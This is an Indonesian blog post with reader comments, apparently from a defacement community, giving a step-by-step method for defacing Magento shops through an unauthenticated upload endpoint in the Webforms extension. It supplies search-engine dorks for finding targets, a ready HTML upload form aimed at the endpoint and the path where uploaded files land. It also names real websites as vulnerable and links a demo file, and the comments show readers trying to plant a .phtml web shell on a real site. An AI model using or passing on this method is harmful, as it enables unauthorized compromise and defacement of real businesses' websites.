Deface Menggunakan Magento Webforms File Upload Vulnerabilty
Artikel dulu : Disini
Google Dork :
- inurl:/webforms/index/index intext:2016
- inurl:/webforms/index/index/ intext:beauty intitle:shop dll
(kembangkan)
atau kalian bisa pakai Dork Magento Add Admin
Dork Magento Lengkap
CSRF:
kalian bisa pakai CSRF Online di Sini
http://www.makarizo.com/coco.php
atau pakai CSRF sendiri
<form method="POST" action="https://site.Target.com/js/webforms/upload/index.php" enctype="multipart/form-data"> <input type="file" name="files[]" /><button>Upload</button> </form>
Kalau pake CSRF Online ini POST File dengan : files[]
Exploit :
www.site.com/path//js/webforms/upload/index.php
Vulnerabilty : []
Contoh site vuln :
https://shop.destrooper.com/js/webforms/upload/index.php
Step By Step :
1. Masukan Target , dan PostFile. kalau sudah klik Kunci Target
kalau sudah , klik Upload
www.site.com/[path]/js/webforms/upload/files/[angka random]/file kita.txt etc
Demo :
https://shop.destrooper.com/js/webforms/upload/files/2zzb4/404.txt
Mau Copas ? tolong sertakan sumber :) gua cape ngetik nya :)
[{"name":"ICS.phtml","size":false,"type":"application\/octet-stream","rand":"mb09z","error":"abort","delete_url":"http:\/\/recambios.eurofred.es\/js\/webforms\/upload\/?file=ICS.phtml","delete_type":"DELETE"}]
ReplyDeletekalo gtu gmn bgkuh ?
ane kgak bsa akses ke shell ?
berarti kg vuln ka ^_^
Deleteoke mkasi bgkuh , ane usaha lagi semangat 45 ^_^
Deletesring'' update cara deface iya bgkuh ;;)
ane pngunjung setia blog ente :*
iya ka :D trims sudah berkunjung ke blog kami ^_^
Deletekenapa kalau upload file .txt bisa ke baca ya gan, tapi klo .phtml kok gak kebaca nich...
ReplyDeletega vuln brarti
ReplyDelete